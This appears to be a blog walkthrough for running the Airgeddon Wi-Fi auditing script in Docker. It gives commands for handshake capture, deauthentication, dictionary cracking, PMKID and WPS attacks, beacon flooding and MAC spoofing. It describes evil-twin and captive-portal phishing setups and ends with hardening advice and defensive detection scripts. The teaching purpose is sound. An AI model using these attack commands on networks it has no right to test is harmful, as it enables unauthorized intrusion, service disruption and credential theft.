
Airgeddon: Setup & Use Walkthrough


Airgeddon is essentially a Swiss Army knife for wireless network auditing, without the risk of nicking your fingers. It's a multi-use bash script that does everything from monitoring to cracking Wi-Fi networks, offering several tools wrapped in one streamlined interface. Trusting your network security to luck is like using a paper umbrella in a hurricane: optimistic, but impractical. This post focuses on using Airgeddon to poke at your own Wi-Fi networks and then implementing more secure practices that will harden your Wi-Fi, saving the paper umbrella for a mai tai.

This post covers the setup of Airgeddon in a Docker container and the usage of various plugins to enhance your wireless network testing and auditing capabilities. Follow legal and ethical guidelines when using these tools.

GitHub Repo

Essential Tools

1. Install Docker:

Ensure Docker is installed and running on your system.

2. Optional: Create a Custom Dockerfile (if you want to customize the image):

  • Create directory

    mkdir airgeddon-docker && cd airgeddon-docker
    

  • Create Dockerfile:

    FROM kalilinux/kali-rolling
    
    RUN apt-get update && \
        apt-get install -y git iw net-tools wireless-tools aircrack-ng reaver macchanger mdk3 gpsd kismet
    
    RUN git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git /opt/airgeddon
    
    WORKDIR /opt/airgeddon
    
    ENTRYPOINT ["./airgeddon.sh"]
    

  • Build Docker image:

    docker build -t custom-airgeddon .
    

3. Run the Container:

  • If using the pre-built image:
    docker run \
      --rm \
      -ti \
      --name airgeddon \
      --net=host \
      --privileged \
      -p 3000:3000 \
      -v /path/to/some/dir/on/your/host:/io \
      -e DISPLAY=$(ifconfig en0 | grep inet | awk '$1=="inet" {print $2}'):0 \
      v1s1t0r1sh3r3/airgeddon
    
  • If using the custom-built image:
    docker run \
      --rm \
      -ti \
      --name airgeddon \
      --net=host \
      --privileged \
      -p 3000:3000 \
      -v /path/to/some/dir/on/your/host:/io \
      -e DISPLAY=$(ifconfig en0 | grep inet | awk '$1=="inet" {print $2}'):0 \
      custom-airgeddon
    

4. Install Additional Dependencies

  • Airgeddon will prompt you to install any missing dependencies when you run it for the first time:
    sudo ./airgeddon.sh
    

Monitor Mode Management

5. Enable Monitor Mode

  • Use tools like airmon-ng to enable monitor mode on your wireless adapter:
    sudo airmon-ng start wlan0
    
  • Verify monitor mode is enabled:
    sudo iwconfig
    

Network Scanner

6. Scan for Wi-Fi Networks

  • Use airodump-ng to scan for available networks:
    sudo airodump-ng wlan0mon
    
  • Note down details like BSSID, channel, encryption type, and signal strength.

Handshake Tools

7. Capture WPA/WPA2 Handshakes

  • Run airodump-ng to capture handshakes:
    sudo airodump-ng --bssid <BSSID> --channel <channel> -w <output_file> wlan0mon
    
  • Perform a deauthentication attack to force a handshake:
    sudo aireplay-ng --deauth 10 -a <BSSID> wlan0mon
    

8. Clean and Verify Handshakes

  • Use tools like wpaclean to clean captured handshakes:
    wpaclean <cleaned_output_file> <raw_capture_file>
    

9. Decrypt Handshakes Offline

  • Use aircrack-ng for dictionary or brute-force attacks:
    aircrack-ng -w <wordlist> -b <BSSID> <capture_file>
    

MITM (Man-In-The-Middle) Attacks

10. Evil Twin Attack

  • Create a rogue access point mimicking a legitimate network using airgeddon:
    sudo ./airgeddon.sh
    
  • Follow the interactive menu to set up an Evil Twin attack.

11. Captive Portal

  • Set up a fake access point with a phishing page using the captive portal feature in Airgeddon:
    sudo ./airgeddon.sh
    
  • Select "Captive Portal" from the menu and configure it.

12. Rogue DHCP

  • Configure a rogue DHCP server to manipulate DNS requests:
    sudo ./airgeddon.sh
    
  • Choose the appropriate option for setting up a rogue DHCP server.

Other Wireless Attacks

13. Deauthentication and Disassociation

  • Use aireplay-ng for deauthentication attacks:
    sudo aireplay-ng --deauth 0 -a <BSSID> wlan0mon
    

14. Beacon Flooding

  • Use mdk3 for beacon flooding:
    sudo mdk3 wlan0mon b -f <SSID_file>
    

15. PMKID Clientless Attack

  • Use tools like hcxdumptool and hcxpcaptool for PMKID attacks:
    sudo hcxdumptool -i wlan0mon -o dumpfile.pcapng --enable_status=1
    sudo hcxpcaptool -z <hash_file> dumpfile.pcapng
    

Testing and Auditing

16. WPS Attacks

  • Use reaver or bully for WPS attacks:
    sudo reaver -i wlan0mon -b <BSSID> -vv
    

17. Known Vulnerabilities Checker

  • Use Airgeddon’s built-in vulnerability checker:
    sudo ./airgeddon.sh
    
  • Select "Known Vulnerabilities Checker" from the menu.

18. Wireless Network Auditing

  • Perform comprehensive network auditing using Airgeddon:
    sudo ./airgeddon.sh
    
  • Choose the "Wireless Network Auditing" option.

Miscellaneous Tools

19. MAC Address Spoofing

  • Change your device’s MAC address using macchanger:
    sudo ifconfig wlan0 down
    sudo macchanger -r wlan0
    sudo ifconfig wlan0 up
    

20. GPS Tracking

  • Track and log GPS data using gpsd and kismet:
    sudo gpsd /dev/ttyUSB0 -F /var/run/gpsd.sock
    sudo kismet
    

21. Interface and Dependency Management

  • Use Airgeddon to manage wireless interfaces and check/install dependencies:
    sudo ./airgeddon.sh
    

Interface and Visual Tools

22. Airgeddon Plugins

  • Extend Airgeddon functionality with plugins:
    sudo ./airgeddon.sh
    
  • Select the "Plugins" option from the menu.

Using Airgeddon Plugins

1. OnlineHashCrack Plugin

  • Purpose: Integrates with the OnlineHashCrack service, allowing users to send captured WPA handshakes or PMKIDs directly from Airgeddon to the online service for remote cracking.
  • Use Case: Useful for users who don’t have the resources to perform intensive local cracking but want to verify the strength of their passwords.

Steps:

  1. Capture WPA Handshake or PMKID:
    • Follow the standard procedure to capture a WPA handshake or PMKID using Airgeddon:
      sudo ./airgeddon.sh
    • Select the appropriate option to capture a handshake or PMKID.

  2. Use OnlineHashCrack Plugin:
    • From the Airgeddon main menu, navigate to "Plugins".
    • Select "OnlineHashCrack Plugin".
    • Follow the prompts to upload the captured handshake or PMKID to the OnlineHashCrack service.
    • Monitor the progress and results directly through the plugin interface.

2. Telegram Bot Plugin

  • Purpose: Sends notifications and results directly to a Telegram bot, enabling real-time monitoring of Airgeddon processes.
  • Use Case: Ideal for long-running attacks or monitoring, where the user might not be directly in front of the terminal but wants updates on the testing status.

Steps:

  1. Set Up Telegram Bot:
    • Create a Telegram bot by talking to BotFather.
    • Note down the bot token provided by BotFather.

  2. Configure Telegram Bot Plugin in Airgeddon:
    • Run Airgeddon:
      sudo ./airgeddon.sh
    • Navigate to "Plugins" and select "Telegram Bot Plugin".
    • Enter the bot token and your Telegram user ID when prompted.
    • Enable notifications for specific Airgeddon processes as desired.

  3. Monitor Notifications:
    • Start an Airgeddon attack or process.
    • Receive real-time updates and results directly on your Telegram app.

3. 5GHz Supported Channels Plugin

  • Purpose: Adds a feature to check the 5 GHz channels supported by your Wi-Fi adapter, which can be crucial for planning attacks or tests on networks operating in the 5 GHz band.
  • Use Case: Helps users understand their hardware capabilities better and optimize their testing strategy for 5 GHz networks.

Steps:

  1. Run Airgeddon:
      sudo ./airgeddon.sh

  2. Check 5GHz Channels:
    • From the Airgeddon main menu, navigate to "Plugins".
    • Select "5GHz Supported Channels Plugin".
    • The plugin will list the 5 GHz channels supported by your Wi-Fi adapter.
    • Use this information to plan your attacks or tests on 5 GHz networks.

4. IP GeoLocation Plugin

  • Purpose: Adds the ability to geolocate IPs associated with the network being audited, providing additional context about the network and potential security risks.
  • Use Case: Useful in scenarios where network auditing involves analysis of access locations or in tracing IP origins for more advanced security assessments.

Steps:

  1. Run Airgeddon:
      sudo ./airgeddon.sh

  2. Use IP GeoLocation Plugin:
    • From the Airgeddon main menu, navigate to "Plugins".
    • Select "IP GeoLocation Plugin".
    • Enter the IP addresses you want to geolocate.
    • The plugin will provide geolocation information for the entered IPs.

5. WPS PIN Companion

  • Purpose: Enhances the WPS features of Airgeddon by adding more sophisticated WPS PIN attack techniques, improving the chances of discovering the WPS PIN of a router.
  • Use Case: Enhances WPS vulnerability testing, critical for assessing the security of WPS-enabled networks, especially those using predictable PIN generation algorithms.

Steps:

  1. Run Airgeddon:
      sudo ./airgeddon.sh

  2. Use WPS PIN Companion:
    • From the Airgeddon main menu, navigate to "Plugins".
    • Select "WPS PIN Companion".
    • Follow the prompts to perform advanced WPS PIN attacks on target routers.
    • The plugin will use sophisticated techniques to improve the chances of discovering the WPS PIN.

Hardening Wi-Fi

To fortify your Wi-Fi network and make it less susceptible to tools like Airgeddon, consider implementing the following security measures:

1. Use Strong Encryption

  • WPA3: Upgrade to WPA3 encryption, which provides enhanced security compared to WPA2.
  • WPA2: If WPA3 is not available, use WPA2 with a strong, complex password (at least 12-16 characters, including numbers, letters, and special characters).

2. Disable WPS

  • WPS (Wi-Fi Protected Setup): Disable WPS on your router so that it cannot be used for brute-force attacks.

3. Use a Strong and Unique Password

  • SSID Password: Create a strong, unique password for your Wi-Fi network. Avoid common words, phrases, or easily guessable information.

4. Regularly Update Firmware

  • Router Firmware: Regularly update your router’s firmware to ensure you have the latest security patches and features.

5. Change Default Router Settings

  • Default SSID: Change the default SSID to something unique and not easily associated with your hardware brand.
  • Default Password: Change the default administrative password to something strong and unique.

6. Enable Network Segmentation

  • Guest Network: Create a separate guest network for visitors and IoT devices. This isolates your main network from potential vulnerabilities in guest devices.

7. Reduce Signal Strength

  • Router Placement: Place your router in a central location and reduce the signal strength to limit the Wi-Fi range to your premises.

8. Enable MAC Address Filtering

  • MAC Filtering: Enable MAC address filtering to restrict network access to known devices. This is not foolproof but adds an extra layer of security.

9. Monitor Network Traffic

  • Network Monitoring Tools: Use network monitoring tools to detect and respond to unusual activity. Many modern routers have built-in monitoring features.
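One way to turn the scan from step 6 into a recurring check for items 1 and 9 is to audit the CSV that airodump-ng writes with -w. The script below is an added example, not part of Airgeddon or the original post; it assumes the usual airodump-ng CSV column order, and the SSID "HomeNet", the BSSIDs and the sample rows are constructed.

```shell
#!/usr/bin/env bash
# Added example: audit an airodump-ng CSV for weak or unexpected APs on your SSID.
# Assumed column order: BSSID, first seen, last seen, channel, speed, Privacy,
# Cipher, Authentication, power, beacons, IVs, LAN IP, ID-length, ESSID, Key.
# ESSIDs that contain commas are not handled.

# usage: audit_scan MY_ESSID "ALLOWED_BSSID ..." < scan-01.csv
# prints one finding per line: ISSUE BSSID detail
audit_scan() {
  awk -F',' -v essid="$1" -v allowed="$2" '
    function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
    BEGIN { n = split(toupper(allowed), a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    /^Station MAC/ { exit }              # client list starts here: stop
    NF < 14 || $1 ~ /BSSID/ { next }     # skip blank lines and the AP header
    trim($14) != essid { next }          # only APs announcing our network name
    {
      bssid = toupper(trim($1)); priv = trim($6); cipher = trim($7)
      # An AP using our SSID from an unknown BSSID is a possible evil twin.
      if (!(bssid in ok)) { print "ROGUE_BSSID", bssid, "not in allowlist"; next }
      # Open, WEP or WPA1 (including WPA/WPA2 mixed mode) is below the WPA2 baseline.
      if (priv ~ /OPN|WEP/ || priv ~ /WPA( |$)/) print "WEAK_ENCRYPTION", bssid, priv
      if (cipher ~ /TKIP/) print "WEAK_CIPHER", bssid, cipher
    }'
}

sample_scan() {   # constructed sample, not a real capture
  cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2024-05-01 10:00:00, 2024-05-01 10:05:00,  6, 270, WPA3 WPA2, CCMP, SAE PSK, -40, 120, 0, 0.  0.  0.  0, 7, HomeNet,
AA:BB:CC:00:00:02, 2024-05-01 10:00:00, 2024-05-01 10:05:00, 11, 130, WPA2 WPA, CCMP TKIP, PSK, -55, 90, 0, 0.  0.  0.  0, 7, HomeNet,
02:11:22:33:44:55, 2024-05-01 10:03:10, 2024-05-01 10:05:00,  6,  54, OPN, , , -30, 80, 0, 0.  0.  0.  0, 7, HomeNet,
DE:AD:BE:EF:00:09, 2024-05-01 10:00:00, 2024-05-01 10:05:00,  1, 130, WPA2, CCMP, PSK, -70, 40, 0, 0.  0.  0.  0, 9, Neighbour,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-05-01 10:01:00, 2024-05-01 10:05:00, -48, 35, AA:BB:CC:00:00:01, HomeNet
EOF
}

sample_scan | audit_scan "HomeNet" "aa:bb:cc:00:00:01 aa:bb:cc:00:00:02"
```

On the sample it reports the mixed-mode AP twice (WPA1 still enabled, TKIP still offered) and the open AP that announces the same SSID from a BSSID you do not own.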

10. Use VPN for Additional Encryption

  • VPN: Use a VPN to encrypt data traffic. This helps protect your information from being intercepted, especially on public or untrusted networks.

11. Disable Unnecessary Features

  • Unused Services: Disable any services or features you do not use, such as remote management or UPnP (Universal Plug and Play).

12. Implement Intrusion Detection and Prevention Systems (IDPS)

  • IDPS: Use IDPS to detect and block malicious activities on your network.
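A minimal detection rule of the kind an IDPS applies to the deauthentication traffic from steps 7 and 13, as an added example that is not part of the original post: it counts deauthentication frames per source address in fixed time windows and reports any source above a threshold. The threshold, the window size and the sample frames are constructed; the input is assumed to be tab-separated tshark field output as shown in the comment.

```shell
#!/usr/bin/env bash
# Added example: flag deauthentication floods in a monitor-mode capture.
# Assumed input, one frame per line (epoch <TAB> source <TAB> destination), e.g. from:
#   tshark -r capture.pcap -Y 'wlan.fc.type_subtype == 12' \
#     -T fields -e frame.time_epoch -e wlan.sa -e wlan.da

# usage: detect_deauth_flood THRESHOLD WINDOW_SECONDS < frames.tsv
# prints: window_start <TAB> source <TAB> frames <TAB> frames_to_broadcast
detect_deauth_flood() {
  awk -F'\t' -v max="$1" -v win="$2" '
    NF >= 3 {
      bucket = int($1 / win) * win                 # start of the fixed window
      key = sprintf("%d\t%s", bucket, tolower($2))
      count[key]++
      if (tolower($3) == "ff:ff:ff:ff:ff:ff") bcast[key]++
    }
    END {
      for (k in count)
        if (count[k] > max) printf "%s\t%d\t%d\n", k, count[k], bcast[k]
    }' | sort
}

sample_frames() {   # constructed sample, not a real capture
  i=0
  while [ "$i" -lt 12 ]; do    # 12 broadcast deauths within about 0.1 s
    printf '1714557600.%02d0000\taa:bb:cc:00:00:01\tff:ff:ff:ff:ff:ff\n' "$i"
    i=$((i + 1))
  done
  # isolated deauths, as seen when a client roams or an AP times a station out
  printf '1714557660.100000\taa:bb:cc:00:00:01\t11:22:33:44:55:66\n'
  printf '1714557605.200000\tde:ad:be:ef:00:09\t11:22:33:44:55:77\n'
}

sample_frames | detect_deauth_flood 5 10
```

The source address of a forged deauthentication frame is normally the access point's own BSSID, so a hit identifies the network being targeted, not the sender.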

13. Educate Users

  • Security Awareness: Educate users on the importance of network security, strong passwords, and recognizing phishing attempts.

By combining these measures, you can significantly enhance the security of your Wi-Fi network and reduce the effectiveness of tools like Airgeddon in extracting information.